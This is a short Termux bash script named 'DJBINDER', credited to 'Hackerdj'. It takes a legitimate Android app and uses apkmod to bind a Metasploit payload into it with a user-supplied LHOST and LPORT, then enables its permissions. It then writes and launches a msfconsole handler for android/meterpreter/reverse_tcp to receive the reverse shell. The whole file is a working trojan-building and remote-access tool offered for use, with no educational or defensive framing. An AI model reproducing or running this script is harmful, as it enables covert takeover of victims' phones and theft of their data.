#!/data/data/com.termux/files/usr/bin/bash
cd /sdcard
mkdir djbinder
cd
cd djbinder
play .welcome.mp3
cd
clear
tput setaf 1; echo "Made by Hackerdj"
echo "     "
echo "      "
echo -e "\033[32m$(figlet -f ASCII-Shadow 'DJBINDER')\033[0m" | lolcat -t
echo "    "
echo "   "
tput setaf 1; echo "INPUT APP PATH"
read path
tput setaf 1; echo "INPUT LHOST"
read lhost
tput setaf 1; echo "INPUT LPORT"
read lport
tput setaf 1; echo "OUTPUT NAME.apk"
read output
apkmod -b "$path" -o /sdcard/djbinder/payload.apk LHOST="$lhost" LPORT="$lport"
apkmod --enable-perm=/sdcard/djbinder/payload.apk -o /sdcard/DjBinder/"$output"
cd
cd /sdcard/djbinder
rm -rf payload.apk
cd
cd djbinder
rm -rf d.rc
tput setaf 1; echo "LHOST$lhost"
tput setaf 1; echo "INTER LISTNER PORT"
read port
echo "use exploit/multi/handler" > d.rc
echo "set payload android/meterpreter/reverse_tcp" >> d.rc
echo "set lhost $lhost" >> d.rc
echo "set lport $port" >> d.rc
echo "exploit" >> d.rc
msfconsole -r d.rc
